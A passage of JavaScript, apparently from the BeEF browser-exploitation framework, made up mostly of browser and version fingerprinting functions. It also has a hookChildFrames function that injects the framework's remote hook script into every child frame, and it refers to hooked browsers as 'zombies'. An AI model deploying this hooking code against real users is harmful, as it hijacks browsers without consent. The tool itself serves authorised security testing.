return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 97) ? true : false);
},
/**
* Returns true if Chrome 98.
* @example: beef.browser.isC98()
*/
isC98: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 98) ? true : false);
},
/**
* Returns true if Chrome for iOS 98.
* @example: beef.browser.isC98iOS()
*/
isC98iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 98) ? true : false);
},
/**
* Returns true if Chrome 99.
* @example: beef.browser.isC99()
*/
isC99: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 99) ? true : false);
},
/**
* Returns true if Chrome for iOS 99.
* @example: beef.browser.isC99iOS()
*/
isC99iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function () {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
},
/**
* Returns true if Opera 9.50 through 9.52.
* @example: beef.browser.isO9_52()
*/
isO9_52: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
},
/**
* Returns true if Opera 9.60 through 9.64.
* @example: beef.browser.isO9_60()
*/
isO9_60: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
},
/**
* Returns true if Opera 10.xx.
* @example: beef.browser.isO10()
*/
isO10: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
},
/**
* Returns true if Opera 11.xx.
* @example: beef.browser.isO11()
*/
isO11: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
},
/**
* Returns true if Opera 12.xx.
* @example: beef.browser.isO12()
*/
isO12: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
},
/**
* Returns true if Opera.
* @example: beef.browser.isO()
*/
isO: function () {
return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
},
/**
* Returns the type of browser being used.
* @example: beef.browser.type().IE6
* @example: beef.browser.type().FF
* @example: beef.browser.type().O
*/
type: function () {
return {
C5: this.isC5(), // Chrome 5
C6: this.isC6(), // Chrome 6
C7: this.isC7(), // Chrome 7
C8: this.isC8(), // Chrome 8
C9: this.isC9(), // Chrome 9
C10: this.isC10(), // Chrome 10
C11: this.isC11(), // Chrome 11
C12: this.isC12(), // Chrome 12
C13: this.isC13(), // Chrome 13
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C19iOS: this.isC19iOS(), // Chrome 19 on iOS
C20: this.isC20(), // Chrome 20
C20iOS: this.isC20iOS(), // Chrome 20 on iOS
C21: this.isC21(), // Chrome 21
C21iOS: this.isC21iOS(), // Chrome 21 on iOS
C22: this.isC22(), // Chrome 22
C22iOS: this.isC22iOS(), // Chrome 22 on iOS
C23: this.isC23(), // Chrome 23
C23iOS: this.isC23iOS(), // Chrome 23 on iOS
C24: this.isC24(), // Chrome 24
C24iOS: this.isC24iOS(), // Chrome 24 on iOS
C25: this.isC25(), // Chrome 25
C25iOS: this.isC25iOS(), // Chrome 25 on iOS
C26: this.isC26(), // Chrome 26
C26iOS: this.isC26iOS(), // Chrome 26 on iOS
C27: this.isC27(), // Chrome 27
C27iOS: this.isC27iOS(), // Chrome 27 on iOS
C28: this.isC28(), // Chrome 28
C28iOS: this.isC28iOS(), // Chrome 28 on iOS
C29: this.isC29(), // Chrome 29
C29iOS: this.isC29iOS(), // Chrome 29 on iOS
C30: this.isC30(), // Chrome 30
C30iOS: this.isC30iOS(), // Chrome 30 on iOS
C31: this.isC31(), // Chrome 31
C31iOS: this.isC31iOS(), // Chrome 31 on iOS
C32: this.isC32(), // Chrome 32
C32iOS: this.isC32iOS(), // Chrome 32 on iOS
C33: this.isC33(), // Chrome 33
C33iOS: this.isC33iOS(), // Chrome 33 on iOS
C34: this.isC34(), // Chrome 34
C34iOS: this.isC34iOS(), // Chrome 34 on iOS
C35: this.isC35(), // Chrome 35
C35iOS: this.isC35iOS(), // Chrome 35 on iOS
C36: this.isC36(), // Chrome 36
C36iOS: this.isC36iOS(), // Chrome 36 on iOS
C37: this.isC37(), // Chrome 37
C37iOS: this.isC37iOS(), // Chrome 37 on iOS
C38: this.isC38(), // Chrome 38
C38iOS: this.isC38iOS(), // Chrome 38 on iOS
C39: this.isC39(), // Chrome 39
C39iOS: this.isC39iOS(), // Chrome 39 on iOS
C40: this.isC40(), // Chrome 40
C40iOS: this.isC40iOS(), // Chrome 40 on iOS
C41: this.isC41(), // Chrome 41
C41iOS: this.isC41iOS(), // Chrome 41 on iOS
C42: this.isC42(), // Chrome 42
C42iOS: this.isC42iOS(), // Chrome 42 on iOS
C43: this.isC43(), // Chrome 43
C43iOS: this.isC43iOS(), // Chrome 43 on iOS
C44: this.isC44(), // Chrome 44
C44iOS: this.isC44iOS(), // Chrome 44 on iOS
C45: this.isC45(), // Chrome 45
C45iOS: this.isC45iOS(), // Chrome 45 on iOS
C46: this.isC46(), // Chrome 46
C46iOS: this.isC46iOS(), // Chrome 46 on iOS
C47: this.isC47(), // Chrome 47
C47iOS: this.isC47iOS(), // Chrome 47 on iOS
C48: this.isC48(), // Chrome 48
C48iOS: this.isC48iOS(), // Chrome 48 on iOS
C49: this.isC49(), // Chrome 49
C49iOS: this.isC49iOS(), // Chrome 49 on iOS
C50: this.isC50(), // Chrome 50
C50iOS: this.isC50iOS(), // Chrome 50 on iOS
C51: this.isC51(), // Chrome 51
C51iOS: this.isC51iOS(), // Chrome 51 on iOS
C52: this.isC52(), // Chrome 52
C52iOS: this.isC52iOS(), // Chrome 52 on iOS
C53: this.isC53(), // Chrome 53
C53iOS: this.isC53iOS(), // Chrome 53 on iOS
C54: this.isC54(), // Chrome 54
C54iOS: this.isC54iOS(), // Chrome 54 on iOS
C55: this.isC55(), // Chrome 55
C55iOS: this.isC55iOS(), // Chrome 55 on iOS
C56: this.isC56(), // Chrome 56
C56iOS: this.isC56iOS(), // Chrome 56 on iOS
C57: this.isC57(), // Chrome 57
C57iOS: this.isC57iOS(), // Chrome 57 on iOS
C58: this.isC58(), // Chrome 58
C58iOS: this.isC58iOS(), // Chrome 58 on iOS
C63iOS: this.isC63iOS(),
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
FF3: this.isFF3(), // Firefox 3
FF3_5: this.isFF3_5(), // Firefox 3.5
FF3_6: this.isFF3_6(), // Firefox 3.6
FF4: this.isFF4(), // Firefox 4
FF5: this.isFF5(), // Firefox 5
FF6: this.isFF6(), // Firefox 6
FF7: this.isFF7(), // Firefox 7
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF14: this.isFF14(), // Firefox 14
FF15: this.isFF15(), // Firefox 15
FF16: this.isFF16(), // Firefox 16
FF17: this.isFF17(), // Firefox 17
FF18: this.isFF18(), // Firefox 18
FF19: this.isFF19(), // Firefox 19
FF20: this.isFF20(), // Firefox 20
FF21: this.isFF21(), // Firefox 21
FF22: this.isFF22(), // Firefox 22
FF23: this.isFF23(), // Firefox 23
FF24: this.isFF24(), // Firefox 24
FF25: this.isFF25(), // Firefox 25
FF26: this.isFF26(), // Firefox 26
FF27: this.isFF27(), // Firefox 27
FF28: this.isFF28(), // Firefox 28
FF29: this.isFF29(), // Firefox 29
FF30: this.isFF30(), // Firefox 30
FF31: this.isFF31(), // Firefox 31
FF32: this.isFF32(), // Firefox 32
FF33: this.isFF33(), // Firefox 33
FF34: this.isFF34(), // Firefox 34
FF35: this.isFF35(), // Firefox 35
FF36: this.isFF36(), // Firefox 36
FF37: this.isFF37(), // Firefox 37
FF38: this.isFF38(), // Firefox 38
FF39: this.isFF39(), // Firefox 39
FF40: this.isFF40(), // Firefox 40
FF41: this.isFF41(), // Firefox 41
FF42: this.isFF42(), // Firefox 42
FF43: this.isFF43(), // Firefox 43
FF44: this.isFF44(), // Firefox 44
FF45: this.isFF45(), // Firefox 45
FF46: this.isFF46(), // Firefox 46
FF47: this.isFF47(), // Firefox 47
FF48: this.isFF48(), // Firefox 48
FF49: this.isFF49(), // Firefox 49
FF50: this.isFF50(), // Firefox 50
FF51: this.isFF51(), // Firefox 51
FF52: this.isFF52(), // Firefox 52
FF53: this.isFF53(), // Firefox 53
FF54: this.isFF54(), // Firefox 54
FF55: this.isFF55(), // Firefox 55
FF56: this.isFF56(), // Firefox 56
FF57: this.isFF57(), // Firefox 57
FF58: this.isFF58(), // Firefox 58
FF59: this.isFF59(), // Firefox 59
FF60: this.isFF60(), // Firefox 60
FF61: this.isFF61(), // Firefox 61
FF62: this.isFF62(), // Firefox 62
FF63: this.isFF63(), // Firefox 63
FF64: this.isFF64(), // Firefox 64
FF65: this.isFF65(), // Firefox 65
FF66: this.isFF66(), // Firefox 66
FF67: this.isFF67(), // Firefox 67
FF68: this.isFF68(), // Firefox 68
FF69: this.isFF69(), // Firefox 69
FF70: this.isFF70(), // Firefox 70
FF71: this.isFF71(), // Firefox 71
FF72: this.isFF72(), // Firefox 72
FF73: this.isFF73(), // Firefox 73
FF74: this.isFF74(), // Firefox 74
FF75: this.isFF75(), // Firefox 75
FF76: this.isFF76(), // Firefox 76
FF77: this.isFF77(), // Firefox 77
FF78: this.isFF78(), // Firefox 78
FF79: this.isFF79(), // Firefox 79
FF80: this.isFF80(), // Firefox 70
FF81: this.isFF81(), // Firefox 81
FF82: this.isFF82(), // Firefox 82
FF83: this.isFF83(), // Firefox 83
FF84: this.isFF84(), // Firefox 85
FF85: this.isFF85(), // Firefox 85
FF86: this.isFF86(), // Firefox 85
FF87: this.isFF87(), // Firefox 87
FF88: this.isFF88(), // Firefox 85
FF89: this.isFF89(), // Firefox 85
FF90: this.isFF90(), // Firefox 80
FF91: this.isFF91(), // Firefox 95
FF92: this.isFF92(), // Firefox 92
FF93: this.isFF93(), // Firefox 95
FF94: this.isFF94(), // Firefox 94
FF95: this.isFF95(), // Firefox 95
FF96: this.isFF96(), // Firefox 96
FF97: this.isFF97(), // Firefox 97
FF98: this.isFF98(), // Firefox 98
FF99: this.isFF99(), // Firefox 99
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
IE7: this.isIE7(), // Internet Explorer 7
IE8: this.isIE8(), // Internet Explorer 8
IE9: this.isIE9(), // Internet Explorer 9
IE10: this.isIE10(), // Internet Explorer 10
IE11: this.isIE11(), // Internet Explorer 11
IE: this.isIE(), // Internet Explorer any version
O9_52: this.isO9_52(), // Opera 9.50 through 9.52
O9_60: this.isO9_60(), // Opera 9.60 through 9.64
O10: this.isO10(), // Opera 10.xx
O11: this.isO11(), // Opera 11.xx
O12: this.isO12(), // Opera 12.xx
O: this.isO(), // Opera any version
EP: this.isEpi(), // Epiphany any version
S4: this.isS4(), // Safari 4.xx
S5: this.isS5(), // Safari 5.xx
S6: this.isS6(), // Safari 6.x
S7: this.isS7(), // Safari 7.x
S8: this.isS8(), // Safari 8.x
S: this.isS() // Safari any version
}
},
/**
* Returns the major version of the browser being used.
* @return: {String} version number || 'UNKNOWN'.
*
* @example: beef.browser.getBrowserVersion()
*/
getBrowserVersion: function () {
if (this.isEdge()) {
try {
return platform.version;
} catch(e) {
return 'unknown';
}
}
; // Microsoft Edge
if (this.isC5()) {
return '5'
}
; // Chrome 5
if (this.isC6()) {
return '6'
}
; // Chrome 6
if (this.isC7()) {
return '7'
}
; // Chrome 7
if (this.isC8()) {
return '8'
}
; // Chrome 8
if (this.isC9()) {
return '9'
}
; // Chrome 9
if (this.isC10()) {
return '10'
}
; // Chrome 10
if (this.isC11()) {
return '11'
}
; // Chrome 11
if (this.isC12()) {
return '12'
}
; // Chrome 12
if (this.isC13()) {
return '13'
}
; // Chrome 13
if (this.isC14()) {
return '14'
}
; // Chrome 14
if (this.isC15()) {
return '15'
}
; // Chrome 15
if (this.isC16()) {
return '16'
}
; // Chrome 16
if (this.isC17()) {
return '17'
}
; // Chrome 17
if (this.isC18()) {
return '18'
}
; // Chrome 18
if (this.isC19()) {
return '19'
}
; // Chrome 19
if (this.isC19iOS()) {
return '19'
}
; // Chrome 19 for iOS
if (this.isC20()) {
return '20'
}
; // Chrome 20
if (this.isC20iOS()) {
return '20'
}
; // Chrome 20 for iOS
if (this.isC21()) {
return '21'
}
; // Chrome 21
if (this.isC21iOS()) {
return '21'
}
; // Chrome 21 for iOS
if (this.isC22()) {
return '22'
}
; // Chrome 22
if (this.isC22iOS()) {
return '22'
}
; // Chrome 22 for iOS
if (this.isC23()) {
return '23'
}
; // Chrome 23
if (this.isC23iOS()) {
return '23'
}
; // Chrome 23 for iOS
if (this.isC24()) {
return '24'
}
; // Chrome 24
if (this.isC24iOS()) {
return '24'
}
; // Chrome 24 for iOS
if (this.isC25()) {
return '25'
}
; // Chrome 25
if (this.isC25iOS()) {
return '25'
}
; // Chrome 25 for iOS
if (this.isC26()) {
return '26'
}
; // Chrome 26
if (this.isC26iOS()) {
return '26'
}
; // Chrome 26 for iOS
if (this.isC27()) {
return '27'
}
; // Chrome 27
if (this.isC27iOS()) {
return '27'
}
; // Chrome 27 for iOS
if (this.isC28()) {
return '28'
}
; // Chrome 28
if (this.isC28iOS()) {
return '28'
}
; // Chrome 28 for iOS
if (this.isC29()) {
return '29'
}
; // Chrome 29
if (this.isC29iOS()) {
return '29'
}
; // Chrome 29 for iOS
if (this.isC30()) {
return '30'
}
; // Chrome 30
if (this.isC30iOS()) {
return '30'
}
; // Chrome 30 for iOS
if (this.isC31()) {
return '31'
}
; // Chrome 31
if (this.isC31iOS()) {
return '31'
}
; // Chrome 31 for iOS
if (this.isC32()) {
return '32'
}
; // Chrome 32
if (this.isC32iOS()) {
return '32'
}
; // Chrome 32 for iOS
if (this.isC33()) {
return '33'
}
; // Chrome 33
if (this.isC33iOS()) {
return '33'
}
; // Chrome 33 for iOS
if (this.isC34()) {
return '34'
}
; // Chrome 34
if (this.isC34iOS()) {
return '34'
}
; // Chrome 34 for iOS
if (this.isC35()) {
return '35'
}
; // Chrome 35
if (this.isC35iOS()) {
return '35'
}
; // Chrome 35 for iOS
if (this.isC36()) {
return '36'
}
; // Chrome 36
if (this.isC36iOS()) {
return '36'
}
; // Chrome 36 for iOS
if (this.isC37()) {
return '37'
}
; // Chrome 37
if (this.isC37iOS()) {
return '37'
}
; // Chrome 37 for iOS
if (this.isC38()) {
return '38'
}
; // Chrome 38
if (this.isC38iOS()) {
return '38'
}
; // Chrome 38 for iOS
if (this.isC39()) {
return '39'
}
; // Chrome 39
if (this.isC39iOS()) {
return '39'
}
; // Chrome 39 for iOS
if (this.isC40()) {
return '40'
}
; // Chrome 40
if (this.isC40iOS()) {
return '40'
}
; // Chrome 40 for iOS
if (this.isC41()) {
return '41'
}
; // Chrome 41
if (this.isC41iOS()) {
return '41'
}
; // Chrome 41 for iOS
if (this.isC42()) {
return '42'
}
; // Chrome 42
if (this.isC42iOS()) {
return '42'
}
; // Chrome 42 for iOS
if (this.isC43()) {
return '43'
}
; // Chrome 43
if (this.isC43iOS()) {
return '43'
}
; // Chrome 43 for iOS
if (this.isC44()) {
return '44'
}
; // Chrome 44
if (this.isC44iOS()) {
return '44'
}
; // Chrome 44 for iOS
if (this.isC45()) {
return '45'
}
; // Chrome 45
if (this.isC45iOS()) {
return '45'
}
; // Chrome 45 for iOS
if (this.isC46()) {
return '46'
}
;// Chrome 46
if (this.isC46iOS()) {
return '46'
}
; // Chrome 46 for iOS
if (this.isC47()) {
return '47'
}
;// Chrome 47
if (this.isC47iOS()) {
return '47'
}
; // Chrome 47 for iOS
if (this.isC48()) {
return '48'
}
;// Chrome 48
if (this.isC48iOS()) {
return '48'
}
; // Chrome 48 for iOS
if (this.isC49()) {
return '49'
}
;// Chrome 49
if (this.isC49iOS()) {
return '49'
}
; // Chrome 49 for iOS
if (this.isC50()) {
return '50'
}
;// Chrome 50
if (this.isC50iOS()) {
return '50'
}
; // Chrome 50 for iOS
if (this.isC51()) {
return '51'
}
;// Chrome 51
if (this.isC51iOS()) {
return '51'
}
; // Chrome 51 for iOS
if (this.isC52()) {
return '52'
}
;// Chrome 52
if (this.isC52iOS()) {
return '52'
}
; // Chrome 52 for iOS
if (this.isC53()) {
return '53'
}
;// Chrome 53
if (this.isC53iOS()) {
return '53'
}
; // Chrome 53 for iOS
if (this.isC54()) {
return '54'
}
;// Chrome 54
if (this.isC54iOS()) {
return '54'
}
; // Chrome 54 for iOS
if (this.isC55()) {
return '55'
}
;// Chrome 55
if (this.isC55iOS()) {
return '55'
}
; // Chrome 55 for iOS
if (this.isC56()) {
return '56'
}
;// Chrome 56
if (this.isC56iOS()) {
return '56'
}
; // Chrome 56 for iOS
if (this.isC57()) {
return '57'
}
;// Chrome 57
if (this.isC57iOS()) {
return '57'
}
; // Chrome 57 for iOS
if (this.isC58()) {
return '58'
}
;// Chrome 58
if (this.isC58iOS()) {
return '58'
}
; // Chrome 58 for iOS
if (this.isFF2()) {
return '2'
}
; // Firefox 2
if (this.isFF3()) {
return '3'
}
; // Firefox 3
if (this.isFF3_5()) {
return '3.5'
}
; // Firefox 3.5
if (this.isFF3_6()) {
return '3.6'
}
; // Firefox 3.6
if (this.isFF4()) {
return '4'
}
; // Firefox 4
if (this.isFF5()) {
return '5'
}
; // Firefox 5
if (this.isFF6()) {
return '6'
}
; // Firefox 6
if (this.isFF7()) {
return '7'
}
; // Firefox 7
if (this.isFF8()) {
return '8'
}
; // Firefox 8
if (this.isFF9()) {
return '9'
}
; // Firefox 9
if (this.isFF10()) {
return '10'
}
; // Firefox 10
if (this.isFF11()) {
return '11'
}
; // Firefox 11
if (this.isFF12()) {
return '12'
}
; // Firefox 12
if (this.isFF13()) {
return '13'
}
; // Firefox 13
if (this.isFF14()) {
return '14'
}
; // Firefox 14
if (this.isFF15()) {
return '15'
}
; // Firefox 15
if (this.isFF16()) {
return '16'
}
; // Firefox 16
if (this.isFF17()) {
return '17'
}
; // Firefox 17
if (this.isFF18()) {
return '18'
}
; // Firefox 18
if (this.isFF19()) {
return '19'
}
; // Firefox 19
if (this.isFF20()) {
return '20'
}
; // Firefox 20
if (this.isFF21()) {
return '21'
}
; // Firefox 21
if (this.isFF22()) {
return '22'
}
; // Firefox 22
if (this.isFF23()) {
return '23'
}
; // Firefox 23
if (this.isFF24()) {
return '24'
}
; // Firefox 24
if (this.isFF25()) {
return '25'
}
; // Firefox 25
if (this.isFF26()) {
return '26'
}
; // Firefox 26
if (this.isFF27()) {
return '27'
}
; // Firefox 27
if (this.isFF28()) {
return '28'
}
; // Firefox 28
if (this.isFF29()) {
return '29'
}
; // Firefox 29
if (this.isFF30()) {
return '30'
}
; // Firefox 30
if (this.isFF31()) {
return '31'
}
; // Firefox 31
if (this.isFF32()) {
return '32'
}
; // Firefox 32
if (this.isFF33()) {
return '33'
}
; // Firefox 33
if (this.isFF34()) {
return '34'
}
; // Firefox 34
if (this.isFF35()) {
return '35'
}
; // Firefox 35
if (this.isFF36()) {
return '36'
}
; // Firefox 36
if (this.isFF37()) {
return '37'
}
; // Firefox 37
if (this.isFF38()) {
return '38'
}
; // Firefox 38
if (this.isFF39()) {
return '39'
}
; // Firefox 39
if (this.isFF40()) {
return '40'
}
; // Firefox 40
if (this.isFF41()) {
return '41'
}
; // Firefox 41
if (this.isFF42()) {
return '42'
}
; // Firefox 42
if (this.isFF43()) {
return '43'
}
; // Firefox 43
if (this.isFF44()) {
return '44'
}
; // Firefox 44
if (this.isFF45()) {
return '45'
}
; // Firefox 45
if (this.isFF46()) {
return '46'
}
; // Firefox 46
if (this.isFF47()) {
return '47'
}
; // Firefox 47
if (this.isFF48()) {
return '48'
}
; // Firefox 48
if (this.isFF49()) {
return '49'
}
; // Firefox 49
if (this.isFF50()) {
return '50'
}
; // Firefox 50
if (this.isFF51()) {
return '51'
}
; // Firefox 51
if (this.isFF52()) {
return '52'
}
; // Firefox 52
if (this.isFF53()) {
return '53'
}
; // Firefox 53
if (this.isFF54()) {
return '54'
}
; // Firefox 54
if (this.isFF55()) {
return '55'
}
; // Firefox 55
if (this.isFF56()) {
return '56'
}
; // Firefox 56
if (this.isFF57()) {
return '57'
}
; // Firefox 57
if (this.isFF58()) {
return '58'
}
; // Firefox 58
if (this.isFF59()) {
return '59'
}
; // Firefox 59
if (this.isFF60()) {
return '60'
}
; // Firefox 60
if (this.isFF61()) {
return '61'
}
; // Firefox 61
if (this.isFF62()) {
return '62'
}
; // Firefox 62
if (this.isFF63()) {
return '63'
}
; // Firefox 63
if (this.isFF64()) {
return '64'
}
; // Firefox 64
if (this.isFF65()) {
return '65'
}
; // Firefox 65
if (this.isFF66()) {
return '66'
}
; // Firefox 66
if (this.isFF67()) {
return '67'
}
; // Firefox 67
if (this.isFF68()) {
return '68'
}
; // Firefox 68
if (this.isFF69()) {
return '69'
}
; // Firefox 69
if (this.isFF70()) {
return '70'
}
; // Firefox 70
if (this.isFF71()) {
return '71'
}
; // Firefox 71
if (this.isFF72()) {
return '72'
}
; // Firefox 72
if (this.isFF73()) {
return '73'
}
; // Firefox 73
if (this.isFF74()) {
return '74'
}
; // Firefox 74
if (this.isFF75()) {
return '75'
}
; // Firefox 75
if (this.isFF76()) {
return '76'
}
; // Firefox 76
if (this.isFF77()) {
return '77'
}
; // Firefox 77
if (this.isFF78()) {
return '78'
}
; // Firefox 78
if (this.isFF79()) {
return '79'
}
; // Firefox 79
if (this.isFF80()) {
return '80'
}
; // Firefox 80
if (this.isFF81()) {
return '81'
}
; // Firefox 81
if (this.isFF82()) {
return '82'
}
; // Firefox 82
if (this.isFF83()) {
return '83'
}
; // Firefox 83
if (this.isFF84()) {
return '84'
}
; // Firefox 84
if (this.isFF85()) {
return '85'
}
; // Firefox 85
if (this.isFF86()) {
return '86'
}
; // Firefox 86
if (this.isFF87()) {
return '87'
}
; // Firefox 87
if (this.isFF88()) {
return '88'
}
; // Firefox 88
if (this.isFF89()) {
return '89'
}
; // Firefox 89
if (this.isFF90()) {
return '90'
}
; // Firefox 90
if (this.isFF91()) {
return '91'
}
; // Firefox 91
if (this.isFF92()) {
return '92'
}
; // Firefox 92
if (this.isFF93()) {
return '93'
}
; // Firefox 93
if (this.isFF94()) {
return '94'
}
; // Firefox 94
if (this.isFF95()) {
return '95'
}
; // Firefox 95
if (this.isFF96()) {
return '96'
}
; // Firefox 96
if (this.isFF97()) {
return '97'
}
; // Firefox 97
if (this.isFF98()) {
return '98'
}
; // Firefox 98
if (this.isFF99()) {
return '99'
}
; // Firefox 99
if (this.isIE6()) {
return '6'
}
; // Internet Explorer 6
if (this.isIE7()) {
return '7'
}
; // Internet Explorer 7
if (this.isIE8()) {
return '8'
}
; // Internet Explorer 8
if (this.isIE9()) {
return '9'
}
; // Internet Explorer 9
if (this.isIE10()) {
return '10'
}
; // Internet Explorer 10
if (this.isIE11()) {
return '11'
}
; // Internet Explorer 11
if (this.isEdge()) {
return '1'
}
; // Microsoft Edge
if (this.isEpi()) {
// believe the UserAgent string for version info - until whenever
var epiphanyRe = /Epiphany\/(\d+)/;
var versionDetails = epiphanyRe.exec( beef.browser.getBrowserReportedName());
if (versionDetails.length > 1) {
return versionDetails[1];
} else {
return "UNKNOWN"; // returns from here or it may take Safari version details
}
}
; // Epiphany
if (this.isS4()) {
return '4'
}
; // Safari 4
if (this.isS5()) {
return '5'
}
; // Safari 5
if (this.isS6()) {
return '6'
}
; // Safari 6
if (this.isS7()) {
return '7'
}
; // Safari 7
if (this.isS8()) {
return '8'
}
; // Safari 8
if (this.isO9_52()) {
return '9.5'
}
; // Opera 9.5x
if (this.isO9_60()) {
return '9.6'
}
; // Opera 9.6
if (this.isO10()) {
return '10'
}
; // Opera 10.xx
if (this.isO11()) {
return '11'
}
; // Opera 11.xx
if (this.isO12()) {
return '12'
}
; // Opera 12.xx
// platform.js
try {
var version = platform.version;
if (!!version)
return version;
} catch (e) {}
return 'UNKNOWN'; // Unknown UA
},
/**
* Returns the type of user agent by hooked browser.
* @return: {String} User agent software.
*
* @example: beef.browser.getBrowserName()
*/
getBrowserName: function () {
if (this.isEdge()) {
return 'E'
}
; // Microsoft Edge any version
if (this.isC()) {
return 'C'
}
; // Chrome any version
if (this.isFF()) {
return 'FF'
}
; // Firefox any version
if (this.isIE()) {
return 'IE'
}
; // Internet Explorer any version
if (this.isO()) {
return 'O'
}
; // Opera any version
if (this.isEpi()) {
return 'EP'
}
; // Epiphany any version
if (this.isS()) {
return 'S'
}
; // Safari any version
if (this.isA()) {
return 'A'
}
; // Avant any version
if (this.isMidori()) {
return 'MI'
}
; // Midori any version
if (this.isOdyssey()) {
return 'OD'
}
; // Odyssey any version
if (this.isBrave()) {
return 'BR'
}
; // Brave any version
return 'UNKNOWN'; // Unknown UA
},
/**
* Hooks all child frames in the current window
* Restricted by same-origin policy
*/
hookChildFrames: function () {
// create script object
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>';
// loop through child frames
for (var i = 0; i < self.frames.length; i++) {
try {
// append hook script
self.frames[i].document.body.appendChild(script);
beef.debug("Hooked child frame [src:" + self.frames[i].window.location.href + "]");
} catch (e) {
// warn on cross-origin
beef.debug("Hooking child frame failed: " + e.message);
}
}
},
/**
* Checks if the zombie has flash installed and enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasFlash()) { ... }
*/
hasFlash: function () {
if (!beef.browser.isIE()) {
return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
}
if (!!navigator.plugins) {
return (navigator.plugins["Shockwave Flash"] != undefined);
}
// IE
var flash_versions = 12;
if (window.ActiveXObject != null) {
for (x = 2; x <= flash_versions; x++) {
try {
Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
if (Flash) {
return true;
}
